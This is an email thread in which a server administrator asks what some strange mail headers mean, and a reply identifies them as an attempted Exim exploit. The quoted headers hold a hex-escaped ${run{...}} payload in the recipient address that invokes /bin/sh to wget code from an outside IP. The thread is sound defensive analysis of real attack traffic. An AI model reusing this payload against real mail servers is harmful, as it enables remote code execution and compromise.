It is an attempted exim exploit. Lmk if you need more info.
On Thu, Jul 11, 2019, 11:54 Dave Wreski <dwre...@guardiandigital.com> wrote:
> Hi all,
>
> Anyone have a guess on what this is trying to accomplish?
>
> From r...@sab.com Thu Jul 11 11:05:10 2019
> Return-Path: <r...@sab.com>
> X-Original-To:
> root+${
> run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
> Delivered-To: usern...@example.com
> Received: by host.example.com (Postfix)
> id B58F61206F7; Thu, 11 Jul 2019 11:05:10 -0400 (EDT)
> Delivered-To:
> root+${
> run{x2fbinx2fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
> Received: from sab.com (ns3.nodename.ru [89.104.77.8])
> by host.example.com (Postfix) with SMTP id 78E6F120294
> for
> <root+${
> run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com>;
>
> Thu, 11 Jul 2019 11:05:10 -0400 (EDT)
>
> The IPs and host.example.com have been changed, but it's otherwise as
> received. Is it a failed attempt at trying to generate a random string,
> or to exploit some parser?
>
>
